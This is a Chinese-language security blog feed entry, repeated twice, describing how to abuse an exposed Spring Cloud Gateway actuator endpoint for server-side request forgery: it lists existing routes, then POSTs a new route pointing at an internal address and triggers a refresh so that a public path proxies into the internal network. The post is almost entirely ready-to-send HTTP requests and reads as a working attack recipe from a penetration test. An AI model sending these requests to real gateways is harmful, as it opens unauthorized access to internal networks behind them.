Ssrf on Ca1s1'Blog https://vuln.top/tags/ssrf/ Recent content in Ssrf on Ca1s1'Blog Hugo -- gohugo.io en-us Sun, 25 May 2025 16:05:30 +0800 Spring添加路由实现ssrf https://vuln.top/posts/spring%E6%B7%BB%E5%8A%A0%E8%B7%AF%E7%94%B1%E5%AE%9E%E7%8E%B0ssrf/ Sun, 25 May 2025 16:05:30 +0800 https://vuln.top/posts/spring%E6%B7%BB%E5%8A%A0%E8%B7%AF%E7%94%B1%E5%AE%9E%E7%8E%B0ssrf/ <p>在某个项目中遇到的gateway接口不支持spel表达式执行命令,但是通过实现ssrf内网漫游</p> <p>查看Gateway/routedefinitions接口可以查看到所有的路由</p> <pre tabindex="0"><code>GET /api/actuator/gateway/routedefinitions HTTP/2 Host: localhost Content-Length: 0 Sec-Ch-Ua-Platform: &#34;macOS&#34; Accept-Language: zh-CN,zh;q=0.9 Sec-Ch-Ua: &#34;Not?A_Brand&#34;;v=&#34;99&#34;, &#34;Chromium&#34;;v=&#34;130&#34; Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: application/json, text/plain, */* Content-Type: application/json;charset=UTF-8 Origin: https://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://localhost/ Accept-Encoding: gzip, deflate, br Priority: u=1, i </code></pre><p>修改http://xxxxxxx/为内网地址</p> <pre tabindex="0"><code>POST /api/actuator/gateway/routes/first HTTP/2 Host: localhost Content-Length: 243 Sec-Ch-Ua-Platform: &#34;macOS&#34; Accept-Language: zh-CN,zh;q=0.9 Sec-Ch-Ua: &#34;Not?A_Brand&#34;;v=&#34;99&#34;, &#34;Chromium&#34;;v=&#34;130&#34; Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: application/json, text/plain, */* Content-Type: application/json Origin: https://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://localhost/ Accept-Encoding: gzip, deflate, br Priority: u=1, i { &#34;id&#34;: &#34;first&#34;, &#34;predicates&#34;: [{ &#34;name&#34;: &#34;Path&#34;, &#34;args&#34;: {&#34;_genkey_0&#34;:&#34;/api/aliyuncer/**&#34;} }], &#34;filters&#34;: [ &#34;StripPrefix=2&#34; ], &#34;uri&#34;: &#34;http://xxxxxxx/&#34;, &#34;order&#34;: -1 } </code></pre><pre tabindex="0"><code>POST /api/actuator/refresh HTTP/2 Host: localhost Sec-Ch-Ua-Platform: &#34;macOS&#34; Accept-Language: zh-CN,zh;q=0.9 Sec-Ch-Ua: &#34;Not?A_Brand&#34;;v=&#34;99&#34;, &#34;Chromium&#34;;v=&#34;130&#34; Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: application/json, text/plain, */* Origin: https://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://localhost/ Accept-Encoding: gzip, deflate, br Priority: u=1, i Content-Type: application/json Content-Length: 0 </code></pre><p>之后访问/api/aliyuncer/即为内网http://xxxxxxx/,通过burp编写替换路径的规则可以实现很方便访问内网的方法。</p> <p>在某个项目中遇到的gateway接口不支持spel表达式执行命令,但是通过实现ssrf内网漫游</p> <p>查看Gateway/routedefinitions接口可以查看到所有的路由</p> <pre tabindex="0"><code>GET /api/actuator/gateway/routedefinitions HTTP/2 Host: localhost Content-Length: 0 Sec-Ch-Ua-Platform: &#34;macOS&#34; Accept-Language: zh-CN,zh;q=0.9 Sec-Ch-Ua: &#34;Not?A_Brand&#34;;v=&#34;99&#34;, &#34;Chromium&#34;;v=&#34;130&#34; Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: application/json, text/plain, */* Content-Type: application/json;charset=UTF-8 Origin: https://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://localhost/ Accept-Encoding: gzip, deflate, br Priority: u=1, i </code></pre><p>修改http://xxxxxxx/为内网地址</p> <pre tabindex="0"><code>POST /api/actuator/gateway/routes/first HTTP/2 Host: localhost Content-Length: 243 Sec-Ch-Ua-Platform: &#34;macOS&#34; Accept-Language: zh-CN,zh;q=0.9 Sec-Ch-Ua: &#34;Not?A_Brand&#34;;v=&#34;99&#34;, &#34;Chromium&#34;;v=&#34;130&#34; Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: application/json, text/plain, */* Content-Type: application/json Origin: https://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://localhost/ Accept-Encoding: gzip, deflate, br Priority: u=1, i { &#34;id&#34;: &#34;first&#34;, &#34;predicates&#34;: [{ &#34;name&#34;: &#34;Path&#34;, &#34;args&#34;: {&#34;_genkey_0&#34;:&#34;/api/aliyuncer/**&#34;} }], &#34;filters&#34;: [ &#34;StripPrefix=2&#34; ], &#34;uri&#34;: &#34;http://xxxxxxx/&#34;, &#34;order&#34;: -1 } </code></pre><pre tabindex="0"><code>POST /api/actuator/refresh HTTP/2 Host: localhost Sec-Ch-Ua-Platform: &#34;macOS&#34; Accept-Language: zh-CN,zh;q=0.9 Sec-Ch-Ua: &#34;Not?A_Brand&#34;;v=&#34;99&#34;, &#34;Chromium&#34;;v=&#34;130&#34; Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: application/json, text/plain, */* Origin: https://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://localhost/ Accept-Encoding: gzip, deflate, br Priority: u=1, i Content-Type: application/json Content-Length: 0 </code></pre><p>之后访问/api/aliyuncer/即为内网http://xxxxxxx/,通过burp编写替换路径的规则可以实现很方便访问内网的方法。</p>